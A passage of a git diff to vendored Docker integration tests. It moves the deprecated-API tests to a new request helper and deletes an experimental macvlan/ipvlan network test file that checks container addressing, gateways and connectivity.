sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json") + res, b, err := request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) b.Close() @@ -185,7 +206,7 @@ func (s *DockerSuite) TestDeprecatedPostContainersStartWithLinksInHostConfig(c * hc := inspectFieldJSON(c, name, "HostConfig") config := `{"HostConfig":` + hc + `}` - res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json") + res, b, err := request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) b.Close() @@ -197,13 +218,15 @@ func (s *DockerSuite) TestDeprecatedPostContainersStartWithLinksInHostConfigIdLi testRequires(c, DaemonIsLinux) name := "test-host-config-links" out, _ := dockerCmd(c, "run", "--name", "link0", "-d", "busybox", "top") + defer dockerCmd(c, "stop", "link0") id := strings.TrimSpace(out) dockerCmd(c, "create", "--name", name, "--link", id, "busybox", "top") + defer dockerCmd(c, "stop", name) hc := inspectFieldJSON(c, name, "HostConfig") config := `{"HostConfig":` + hc + `}` - res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+name+"/start"), strings.NewReader(config), "application/json") + res, b, err := request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) b.Close() @@ -217,7 +240,7 @@ func (s *DockerSuite) TestDeprecatedStartWithNilDNS(c *check.C) { config := `{"HostConfig": {"Dns": null}}` - res, b, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+containerID+"/start"), 
strings.NewReader(config), "application/json") + res, b, err := request.Post(formatV123StartAPIURL("/containers/"+containerID+"/start"), request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) b.Close() diff --git a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go index 94ef9b1a00..c182b2a7aa 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_unix_test.go @@ -5,7 +5,8 @@ package main import ( "fmt" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) @@ -21,7 +22,7 @@ func (s *DockerNetworkSuite) TestDeprecatedDockerNetworkStartAPIWithHostconfig(c "NetworkMode": netName, }, } - _, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/"+conName+"/start"), config) + _, _, err := request.Post(formatV123StartAPIURL("/containers/"+conName+"/start"), request.JSONBody(config)) c.Assert(err, checker.IsNil) c.Assert(waitRun(conName), checker.IsNil) networks := inspectField(c, conName, "NetworkSettings.Networks") diff --git a/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go b/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go deleted file mode 100644 index 85dec31948..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go +++ /dev/null @@ -1,594 +0,0 @@ -// +build !windows - -package main - -import ( - "os/exec" - "strings" - "time" - - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" - "github.com/docker/docker/pkg/parsers/kernel" - 
"github.com/go-check/check" -) - -var ( - MacvlanKernelSupport = testRequirement{ - func() bool { - const macvlanKernelVer = 3 // minimum macvlan kernel support - const macvlanMajorVer = 9 // minimum macvlan major kernel support - kv, err := kernel.GetKernelVersion() - if err != nil { - return false - } - // ensure Kernel version is >= v3.9 for macvlan support - if kv.Kernel < macvlanKernelVer || (kv.Kernel == macvlanKernelVer && kv.Major < macvlanMajorVer) { - return false - } - return true - }, - "kernel version failed to meet the minimum macvlan kernel requirement of 3.9", - } - IpvlanKernelSupport = testRequirement{ - func() bool { - const ipvlanKernelVer = 4 // minimum ipvlan kernel support - const ipvlanMajorVer = 2 // minimum ipvlan major kernel support - kv, err := kernel.GetKernelVersion() - if err != nil { - return false - } - // ensure Kernel version is >= v4.2 for ipvlan support - if kv.Kernel < ipvlanKernelVer || (kv.Kernel == ipvlanKernelVer && kv.Major < ipvlanMajorVer) { - return false - } - return true - }, - "kernel version failed to meet the minimum ipvlan kernel requirement of 4.0.0", - } -) - -func (s *DockerNetworkSuite) TestDockerNetworkMacvlanPersistance(c *check.C) { - // verify the driver automatically provisions the 802.1q link (dm-dummy0.60) - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - - // master dummy interface 'dm' abbreviation represents 'docker macvlan' - master := "dm-dummy0" - // simulate the master link the vlan tagged subinterface parent link will use - out, err := createMasterDummy(c, master) - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network specifying the desired sub-interface name - dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.60", "dm-persist") - assertNwIsAvailable(c, "dm-persist") - // Restart docker daemon to test the config has persisted to disk - s.d.Restart() - // verify network is recreated from persistence 
- assertNwIsAvailable(c, "dm-persist") - // cleanup the master interface that also collects the slave dev - deleteInterface(c, "dm-dummy0") -} - -func (s *DockerNetworkSuite) TestDockerNetworkIpvlanPersistance(c *check.C) { - // verify the driver automatically provisions the 802.1q link (di-dummy0.70) - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - // master dummy interface 'di' notation represent 'docker ipvlan' - master := "di-dummy0" - // simulate the master link the vlan tagged subinterface parent link will use - out, err := createMasterDummy(c, master) - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network specifying the desired sub-interface name - dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.70", "di-persist") - assertNwIsAvailable(c, "di-persist") - // Restart docker daemon to test the config has persisted to disk - s.d.Restart() - // verify network is recreated from persistence - assertNwIsAvailable(c, "di-persist") - // cleanup the master interface that also collects the slave dev - deleteInterface(c, "di-dummy0") -} - -func (s *DockerNetworkSuite) TestDockerNetworkMacvlanSubIntCreate(c *check.C) { - // verify the driver automatically provisions the 802.1q link (dm-dummy0.50) - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - // master dummy interface 'dm' abbreviation represents 'docker macvlan' - master := "dm-dummy0" - // simulate the master link the vlan tagged subinterface parent link will use - out, err := createMasterDummy(c, master) - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network specifying the desired sub-interface name - dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.50", "dm-subinterface") - assertNwIsAvailable(c, "dm-subinterface") - // cleanup the master interface which also collects the slave dev - deleteInterface(c, "dm-dummy0") -} - 
-func (s *DockerNetworkSuite) TestDockerNetworkIpvlanSubIntCreate(c *check.C) { - // verify the driver automatically provisions the 802.1q link (di-dummy0.50) - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - // master dummy interface 'dm' abbreviation represents 'docker ipvlan' - master := "di-dummy0" - // simulate the master link the vlan tagged subinterface parent link will use - out, err := createMasterDummy(c, master) - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network specifying the desired sub-interface name - dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.60", "di-subinterface") - assertNwIsAvailable(c, "di-subinterface") - // cleanup the master interface which also collects the slave dev - deleteInterface(c, "di-dummy0") -} - -func (s *DockerNetworkSuite) TestDockerNetworkMacvlanOverlapParent(c *check.C) { - // verify the same parent interface cannot be used if already in use by an existing network - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - // master dummy interface 'dm' abbreviation represents 'docker macvlan' - master := "dm-dummy0" - out, err := createMasterDummy(c, master) - c.Assert(err, check.IsNil, check.Commentf(out)) - out, err = createVlanInterface(c, master, "dm-dummy0.40", "40") - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network using an existing parent interface - dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.40", "dm-subinterface") - assertNwIsAvailable(c, "dm-subinterface") - // attempt to create another network using the same parent iface that should fail - out, _, err = dockerCmdWithError("network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.40", "dm-parent-net-overlap") - // verify that the overlap returns an error - c.Assert(err, check.NotNil) - // cleanup the master interface which also collects the slave dev - 
deleteInterface(c, "dm-dummy0") -} - -func (s *DockerNetworkSuite) TestDockerNetworkIpvlanOverlapParent(c *check.C) { - // verify the same parent interface cannot be used if already in use by an existing network - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - // master dummy interface 'dm' abbreviation represents 'docker ipvlan' - master := "di-dummy0" - out, err := createMasterDummy(c, master) - c.Assert(err, check.IsNil, check.Commentf(out)) - out, err = createVlanInterface(c, master, "di-dummy0.30", "30") - c.Assert(err, check.IsNil, check.Commentf(out)) - // create a network using an existing parent interface - dockerCmd(c, "network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.30", "di-subinterface") - assertNwIsAvailable(c, "di-subinterface") - // attempt to create another network using the same parent iface that should fail - out, _, err = dockerCmdWithError("network", "create", "--driver=ipvlan", "-o", "parent=di-dummy0.30", "di-parent-net-overlap") - // verify that the overlap returns an error - c.Assert(err, check.NotNil) - // cleanup the master interface which also collects the slave dev - deleteInterface(c, "di-dummy0") -} - -func (s *DockerNetworkSuite) TestDockerNetworkMacvlanMultiSubnet(c *check.C) { - // create a dual stack multi-subnet Macvlan bridge mode network and validate connectivity between four containers, two on each subnet - testRequires(c, DaemonIsLinux, IPv6, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=macvlan", "--ipv6", "--subnet=172.28.100.0/24", "--subnet=172.28.102.0/24", "--gateway=172.28.102.254", - "--subnet=2001:db8:abc2::/64", "--subnet=2001:db8:abc4::/64", "--gateway=2001:db8:abc4::254", "dualstackbridge") - // Ensure the network was created - assertNwIsAvailable(c, "dualstackbridge") - // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 
172.28.100.0/24 and 2001:db8:abc2::/64 - dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=first", "--ip", "172.28.100.20", "--ip6", "2001:db8:abc2::20", "busybox", "top") - dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=second", "--ip", "172.28.100.21", "--ip6", "2001:db8:abc2::21", "busybox", "top") - - // Inspect and store the v4 address from specified container on the network dualstackbridge - ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackbridge - ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.GlobalIPv6Address") - - // verify ipv4 connectivity to the explicit --ipv address second to first - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - // verify ipv6 connectivity to the explicit --ipv6 address second to first - c.Skip("Temporarily skipping while invesitigating sporadic v6 CI issues") - _, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.102.0/24 and 2001:db8:abc4::/64 - dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=third", "--ip", "172.28.102.20", "--ip6", "2001:db8:abc4::20", "busybox", "top") - dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=fourth", "--ip", "172.28.102.21", "--ip6", "2001:db8:abc4::21", "busybox", "top") - - // Inspect and store the v4 address from specified container on the network dualstackbridge - ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackbridge - ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.GlobalIPv6Address") - - // verify ipv4 
connectivity to the explicit --ipv address from third to fourth - _, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth - _, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // Inspect the v4 gateway to ensure the proper default GW was assigned - ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.Gateway") - c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.100.1") - // Inspect the v6 gateway to ensure the proper default GW was assigned - ip6gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackbridge.IPv6Gateway") - c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc2::1") - - // Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned - ip4gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.Gateway") - c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.102.254") - // Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned - ip6gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackbridge.IPv6Gateway") - c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc4::254") -} - -func (s *DockerNetworkSuite) TestDockerNetworkIpvlanL2MultiSubnet(c *check.C) { - // create a dual stack multi-subnet Ipvlan L2 network and validate connectivity within the subnets, two on each subnet - testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.200.0/24", "--subnet=172.28.202.0/24", "--gateway=172.28.202.254", - "--subnet=2001:db8:abc8::/64", "--subnet=2001:db8:abc6::/64", "--gateway=2001:db8:abc6::254", "dualstackl2") - // Ensure the network was created - assertNwIsAvailable(c, 
"dualstackl2") - // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.200.0/24 and 2001:db8:abc8::/64 - dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=first", "--ip", "172.28.200.20", "--ip6", "2001:db8:abc8::20", "busybox", "top") - dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=second", "--ip", "172.28.200.21", "--ip6", "2001:db8:abc8::21", "busybox", "top") - - // Inspect and store the v4 address from specified container on the network dualstackl2 - ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackl2 - ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.GlobalIPv6Address") - - // verify ipv4 connectivity to the explicit --ipv address second to first - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - // verify ipv6 connectivity to the explicit --ipv6 address second to first - _, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.202.0/24 and 2001:db8:abc6::/64 - dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=third", "--ip", "172.28.202.20", "--ip6", "2001:db8:abc6::20", "busybox", "top") - dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=fourth", "--ip", "172.28.202.21", "--ip6", "2001:db8:abc6::21", "busybox", "top") - - // Inspect and store the v4 address from specified container on the network dualstackl2 - ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackl2 - ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.GlobalIPv6Address") - - // verify ipv4 connectivity to the 
explicit --ipv address from third to fourth - _, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth - _, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // Inspect the v4 gateway to ensure the proper default GW was assigned - ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.Gateway") - c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.200.1") - // Inspect the v6 gateway to ensure the proper default GW was assigned - ip6gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl2.IPv6Gateway") - c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc8::1") - - // Inspect the v4 gateway to ensure the proper explicitly assigned default GW was assigned - ip4gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.Gateway") - c.Assert(strings.TrimSpace(ip4gw), check.Equals, "172.28.202.254") - // Inspect the v6 gateway to ensure the proper explicitly assigned default GW was assigned - ip6gw = inspectField(c, "third", "NetworkSettings.Networks.dualstackl2.IPv6Gateway") - c.Assert(strings.TrimSpace(ip6gw), check.Equals, "2001:db8:abc6::254") -} - -func (s *DockerNetworkSuite) TestDockerNetworkIpvlanL3MultiSubnet(c *check.C) { - // create a dual stack multi-subnet Ipvlan L3 network and validate connectivity between all four containers per L3 mode - testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, IPv6, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.10.0/24", "--subnet=172.28.12.0/24", "--gateway=172.28.12.254", - "--subnet=2001:db8:abc9::/64", "--subnet=2001:db8:abc7::/64", "--gateway=2001:db8:abc7::254", "-o", "ipvlan_mode=l3", "dualstackl3") - // Ensure the network was created - assertNwIsAvailable(c, 
"dualstackl3") - - // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.10.0/24 and 2001:db8:abc9::/64 - dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=first", "--ip", "172.28.10.20", "--ip6", "2001:db8:abc9::20", "busybox", "top") - dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=second", "--ip", "172.28.10.21", "--ip6", "2001:db8:abc9::21", "busybox", "top") - - // Inspect and store the v4 address from specified container on the network dualstackl3 - ip := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackl3 - ip6 := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address") - - // verify ipv4 connectivity to the explicit --ipv address second to first - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - // verify ipv6 connectivity to the explicit --ipv6 address second to first - _, _, err = dockerCmdWithError("exec", "second", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // start dual stack containers and verify the user specified --ip and --ip6 addresses on subnets 172.28.12.0/24 and 2001:db8:abc7::/64 - dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=third", "--ip", "172.28.12.20", "--ip6", "2001:db8:abc7::20", "busybox", "top") - dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=fourth", "--ip", "172.28.12.21", "--ip6", "2001:db8:abc7::21", "busybox", "top") - - // Inspect and store the v4 address from specified container on the network dualstackl3 - ip = inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackl3 - ip6 = inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address") - - // verify ipv4 connectivity to the 
explicit --ipv address from third to fourth - _, _, err = dockerCmdWithError("exec", "fourth", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - // verify ipv6 connectivity to the explicit --ipv6 address from third to fourth - _, _, err = dockerCmdWithError("exec", "fourth", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // Inspect and store the v4 address from specified container on the network dualstackl3 - ip = inspectField(c, "second", "NetworkSettings.Networks.dualstackl3.IPAddress") - // Inspect and store the v6 address from specified container on the network dualstackl3 - ip6 = inspectField(c, "second", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address") - - // Verify connectivity across disparate subnets which is unique to L3 mode only - _, _, err = dockerCmdWithError("exec", "third", "ping", "-c", "1", strings.TrimSpace(ip)) - c.Assert(err, check.IsNil) - _, _, err = dockerCmdWithError("exec", "third", "ping6", "-c", "1", strings.TrimSpace(ip6)) - c.Assert(err, check.IsNil) - - // Inspect the v4 gateway to ensure no next hop is assigned in L3 mode - ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.Gateway") - c.Assert(strings.TrimSpace(ip4gw), check.Equals, "") - // Inspect the v6 gateway to ensure the explicitly specified default GW is ignored per L3 mode enabled - ip6gw := inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.IPv6Gateway") - c.Assert(strings.TrimSpace(ip6gw), check.Equals, "") -} - -func (s *DockerNetworkSuite) TestDockerNetworkIpvlanAddressing(c *check.C) { - // Ensure the default gateways, next-hops and default dev devices are properly set - testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=macvlan", "--ipv6", "--subnet=172.28.130.0/24", - "--subnet=2001:db8:abca::/64", "--gateway=2001:db8:abca::254", "-o", "macvlan_mode=bridge", "dualstackbridge") 
- assertNwIsAvailable(c, "dualstackbridge") - dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=first", "busybox", "top") - // Validate macvlan bridge mode defaults gateway sets the default IPAM next-hop inferred from the subnet - out, _, err := dockerCmdWithError("exec", "first", "ip", "route") - c.Assert(err, check.IsNil) - c.Assert(out, checker.Contains, "default via 172.28.130.1 dev eth0") - // Validate macvlan bridge mode sets the v6 gateway to the user specified default gateway/next-hop - out, _, err = dockerCmdWithError("exec", "first", "ip", "-6", "route") - c.Assert(err, check.IsNil) - c.Assert(out, checker.Contains, "default via 2001:db8:abca::254 dev eth0") - - // Verify ipvlan l2 mode sets the proper default gateway routes via netlink - // for either an explicitly set route by the user or inferred via default IPAM - dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.140.0/24", "--gateway=172.28.140.254", - "--subnet=2001:db8:abcb::/64", "-o", "ipvlan_mode=l2", "dualstackl2") - assertNwIsAvailable(c, "dualstackl2") - dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=second", "busybox", "top") - // Validate ipvlan l2 mode defaults gateway sets the default IPAM next-hop inferred from the subnet - out, _, err = dockerCmdWithError("exec", "second", "ip", "route") - c.Assert(err, check.IsNil) - c.Assert(out, checker.Contains, "default via 172.28.140.254 dev eth0") - // Validate ipvlan l2 mode sets the v6 gateway to the user specified default gateway/next-hop - out, _, err = dockerCmdWithError("exec", "second", "ip", "-6", "route") - c.Assert(err, check.IsNil) - c.Assert(out, checker.Contains, "default via 2001:db8:abcb::1 dev eth0") - - // Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops - dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.160.0/24", "--gateway=172.28.160.254", - "--subnet=2001:db8:abcd::/64", 
"--gateway=2001:db8:abcd::254", "-o", "ipvlan_mode=l3", "dualstackl3") - assertNwIsAvailable(c, "dualstackl3") - dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=third", "busybox", "top") - // Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops - out, _, err = dockerCmdWithError("exec", "third", "ip", "route") - c.Assert(err, check.IsNil) - c.Assert(out, checker.Contains, "default dev eth0") - // Validate ipvlan l3 mode sets the v6 gateway to dev eth0 and disregards any explicit or inferred next-hops - out, _, err = dockerCmdWithError("exec", "third", "ip", "-6", "route") - c.Assert(err, check.IsNil) - c.Assert(out, checker.Contains, "default dev eth0") -} - -func (s *DockerSuite) TestDockerNetworkMacVlanBridgeNilParent(c *check.C) { - // macvlan bridge mode - dummy parent interface is provisioned dynamically - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=macvlan", "dm-nil-parent") - assertNwIsAvailable(c, "dm-nil-parent") - - // start two containers on the same subnet - dockerCmd(c, "run", "-d", "--net=dm-nil-parent", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=dm-nil-parent", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - - // intra-network communications should succeed - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestDockerNetworkMacVlanBridgeInternalMode(c *check.C) { - // macvlan bridge mode --internal containers can communicate inside the network but not externally - testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=macvlan", "--internal", "dm-internal") - assertNwIsAvailable(c, "dm-internal") - nr := 
getNetworkResource(c, "dm-internal") - c.Assert(nr.Internal, checker.True) - - // start two containers on the same subnet - dockerCmd(c, "run", "-d", "--net=dm-internal", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=dm-internal", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - - // access outside of the network should fail - result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8") - c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) - - // intra-network communications should succeed - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestDockerNetworkIpvlanL2NilParent(c *check.C) { - // ipvlan l2 mode - dummy parent interface is provisioned dynamically - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=ipvlan", "di-nil-parent") - assertNwIsAvailable(c, "di-nil-parent") - - // start two containers on the same subnet - dockerCmd(c, "run", "-d", "--net=di-nil-parent", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=di-nil-parent", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - - // intra-network communications should succeed - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestDockerNetworkIpvlanL2InternalMode(c *check.C) { - // ipvlan l2 mode --internal containers can communicate inside the network but not externally - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=ipvlan", "--internal", "di-internal") - assertNwIsAvailable(c, "di-internal") - nr := 
getNetworkResource(c, "di-internal") - c.Assert(nr.Internal, checker.True) - - // start two containers on the same subnet - dockerCmd(c, "run", "-d", "--net=di-internal", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--net=di-internal", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - - // access outside of the network should fail - result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8") - c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) - // intra-network communications should succeed - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestDockerNetworkIpvlanL3NilParent(c *check.C) { - // ipvlan l3 mode - dummy parent interface is provisioned dynamically - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - dockerCmd(c, "network", "create", "--driver=ipvlan", "--subnet=172.28.230.0/24", - "--subnet=172.28.220.0/24", "-o", "ipvlan_mode=l3", "di-nil-parent-l3") - assertNwIsAvailable(c, "di-nil-parent-l3") - - // start two containers on separate subnets - dockerCmd(c, "run", "-d", "--ip=172.28.220.10", "--net=di-nil-parent-l3", "--name=first", "busybox", "top") - c.Assert(waitRun("first"), check.IsNil) - dockerCmd(c, "run", "-d", "--ip=172.28.230.10", "--net=di-nil-parent-l3", "--name=second", "busybox", "top") - c.Assert(waitRun("second"), check.IsNil) - - // intra-network communications should succeed - _, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first") - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestDockerNetworkIpvlanL3InternalMode(c *check.C) { - // ipvlan l3 mode --internal containers can communicate inside the network but not externally - testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon) - 
